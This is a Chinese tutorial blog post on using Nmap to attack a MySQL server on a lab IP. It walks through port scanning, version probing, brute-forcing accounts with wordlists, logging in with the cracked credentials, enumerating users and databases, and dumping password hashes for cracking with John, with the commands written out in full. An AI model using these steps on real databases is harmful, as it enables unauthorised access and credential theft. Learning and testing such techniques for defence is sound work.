前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >namp肾透mysql之路

namp肾透mysql之路

原创
作者头像
逍遥子大表哥
发布2022-08-28 14:55:47
3451
发布2022-08-28 14:55:47
举报
文章被收录于专栏:kali blogkali blog

利用Nmap我们可以对mysql数据库进行渗透测试。通过目标的数据库名称、表、用户名,密码等核心信息进行收集,来完成肾透。本文让我们来一起学习。

端口扫描

我们先利用namp对目标进行扫描,看是否开启了3306端口。

代码语言:javascript
复制
nmap -T4 -A -sT 192.168.5.38
微信公众号 kali黑客笔记
微信公众号 kali黑客笔记

如上图,我们可以看到目标开启了80 8080 3306等端口。而3306就是我们所需的数据库端口。

检索 MySQL 信息

通过下面命令,我们可以查看当前数据的版本、协议等相关的信息。

代码语言:javascript
复制
nmap --script=mysql-info 192.168.5.38
微信公众号 kali黑客笔记
微信公众号 kali黑客笔记

如上,我们发现目前正在运行的数据库版本为5.7.26

暴力破解账号

没错,我们的神器nmap也是具有暴力破解功能的。执行下面命令可以破解出当前数据库的账号和用户名。 当然这里的破解需要的是你的运气了。

代码语言:javascript
复制
nmap -p3306 --script=mysql-brute --script-args userdb=/root/user.txt,passdb=/root/pass.txt 192.168.5.38

参数说明 userdb:用户名字典

passdb:密码字典 破解效果如下

微信公众号 kali黑客笔记
微信公众号 kali黑客笔记

得到了两个数据库的用户名和密 lnds:123456@@ wp:123456@@

到这一步,我们便可以利用破解到的用户名和密码进行登录数据库。

代码语言:javascript
复制
mysql -h 192.168.5.38 -u wp -p
微信公众号 kali黑客笔记
微信公众号 kali黑客笔记

当然,如果你有幸破解了root账号的密码,我们可以执行下面两个好玩的命令。

列举其他用户名

代码语言:javascript
复制
nmap -p3306 192.168.5.38 --script=mysql-users --script-args mysqluser=root,mysqlpass=toor

列举其他数据库

代码语言:javascript
复制
nmap -p3306 192.168.5.38 --script=mysql-databases --script-args mysqluser=root,mysqlpass=toor

检索哈希

代码语言:javascript
复制
nmap -p3306 192.168.5.38 --script=mysql-dump-hashes --script-args username=root,password=toor

通过这条命令,我们可以列出数据库中其他用户的hash值,然后我们在利用john等破解工具进行hash的破解。从而得到其他用户的密码。

总结

nmap对mysql的肾透,可见神器并非浪得虚名。但是无论哪种工具都有一定的局限性。如本文中,需要开启3306 数据库需要所有人可登录、需要强劲的密码字典。

原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。

如有侵权,请联系 cloudcommunity@tencent.com 删除。

原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。

如有侵权,请联系 cloudcommunity@tencent.com 删除。

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 端口扫描
  • 检索 MySQL 信息
  • 暴力破解账号
  • 列举其他用户名
  • 列举其他数据库
  • 检索哈希
  • 总结
相关产品与服务
云数据库 SQL Server
腾讯云数据库 SQL Server (TencentDB for SQL Server)是业界最常用的商用数据库之一,对基于 Windows 架构的应用程序具有完美的支持。TencentDB for SQL Server 拥有微软正版授权,可持续为用户提供最新的功能,避免未授权使用软件的风险。具有即开即用、稳定可靠、安全运行、弹性扩缩等特点。
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档